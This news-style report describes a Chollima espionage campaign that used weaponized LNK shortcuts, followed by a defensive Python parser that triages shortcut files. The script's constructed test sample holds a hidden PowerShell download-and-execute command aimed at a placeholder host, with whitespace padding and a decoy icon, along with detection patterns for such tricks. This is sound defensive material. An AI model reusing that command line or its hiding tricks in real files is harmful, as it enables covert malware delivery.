Chollima Hackers Use Stealth LNK Malware in Targeted Cyber-Espionage Campaign
The Chollima advanced persistent threat group has initiated a targeted cyber-espionage campaign using malicious Windows shortcut files (LNK) to deliver multi-stage malware aimed at activists and analysts monitoring North Korea. By embedding weaponized LNK files in compressed attachments or cloud-hosted links, the campaign effectively bypassed security filters, enabling the theft of sensitive information and system reconnaissance. Security firms noted the campaign's evolution in tactics, reflecting similarities to previous Chollima operations.

The Chollima advanced persistent threat group has launched a cyber-espionage campaign that uses malicious Windows shortcut files (LNK) to deliver multi-stage malware to activists and analysts who monitor North Korea. The weaponized LNK files were delivered inside compressed attachments or behind cloud-hosted download links, so the lure emails passed through security filters that inspect attachments directly.
Opening the LNK file ran a command line hidden in the shortcut's target and arguments, which launched PowerShell scripts that downloaded further malware components from sources disguised to look legitimate. The malware was built for information theft and reconnaissance: it harvested system metadata, browser credentials, and documents, then exfiltrated that data to command-and-control servers.
The campaign leveraged trust networks by impersonating recognized experts, which made the lures more convincing. Security firms noted similarities to previous Chollima operations, describing the campaign as an incremental evolution of the group's established tactics.
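The detail that matters for defenders is that the "hidden command" lives in fields of the shortcut file itself, which any LNK triage tool can read before the file is ever double-clicked. The script below is an added example, not code from the article or from any vendor report on this campaign: a minimal parser for the MS-SHLLINK format that extracts the relative path, arguments, icon and ShowCommand fields, and a set of heuristics for the "shortcut that really launches PowerShell" pattern. The heuristics (PowerShell in the target, hidden or minimised window, download cmdlets, whitespace padding that pushes the payload out of the Properties dialog, a document-viewer icon on a script launcher) are generic LNK-abuse indicators, not details of the Chollima samples, which the article does not describe. The two shortcut files are constructed in the script (the `example.invalid` URL is a placeholder) so it runs offline.

```python
"""Triage Windows .lnk (MS-SHLLINK) files for the shortcut-launches-PowerShell pattern.

Added example: parser + heuristics for LNK triage. Sample shortcuts are built
in build_lnk() so the script runs without any real malware on disk.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value commonly used to keep the console off screen

# StringData blocks appear in this fixed order when their flag bit is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the header fields and StringData of a ShellLink as a dict."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink (bad HeaderSize or LinkCLSID)")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (u16) + IDList
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {"flags": flags, "show_command": show_cmd}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)  # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


# (regex over relative_path + arguments, finding label)
SUSPICIOUS = (
    (r"powershell|pwsh", "launches PowerShell"),
    (r"-(w|win|window|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin", "remote download"),
    (r"-(nop|noprofile)\b", "no profile"),
    (r"-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
)


def triage(fields: dict) -> list:
    """Return human-readable findings for a parsed shortcut (empty list = nothing flagged)."""
    findings = []
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    for pattern, why in SUSPICIOUS:
        if re.search(pattern, cmd, re.I):
            findings.append(why)
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised (SW_SHOWMINNOACTIVE)")
    if re.search(r"\s{200,}", fields.get("arguments", "")):
        findings.append("whitespace padding hides payload in Properties dialog")
    icon = fields.get("icon_location", "")
    if "powershell" in cmd.lower() and re.search(r"notepad|winword|excel|acro|\.pdf|\.docx?", icon, re.I):
        findings.append("document-viewer icon on a PowerShell launcher")
    return findings


def build_lnk(rel_path: str, args: str, icon: str = "", show: int = 1) -> bytes:
    """Construct a minimal ShellLink (no IDList/LinkInfo) for offline testing."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE | (HAS_ICON if icon else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, show, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(rel_path) + string_data(args) + (string_data(icon) if icon else b"")
    return header + body + b"\x00\x00\x00\x00"  # TerminalBlock ends ExtraData


# Constructed samples (hypothetical, not the campaign's files).
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    " " * 300 + "-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2')\"",
    icon=r"%SystemRoot%\System32\notepad.exe", show=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage(parse_lnk(blob)))
```

For real files, read the bytes and call `triage(parse_lnk(data))`; the parser deliberately skips the IDList and LinkInfo structures rather than decoding them, since the command line that runs on double-click is carried in the RelativePath/Arguments StringData (or in the target path inside the IDList, which this example does not decode).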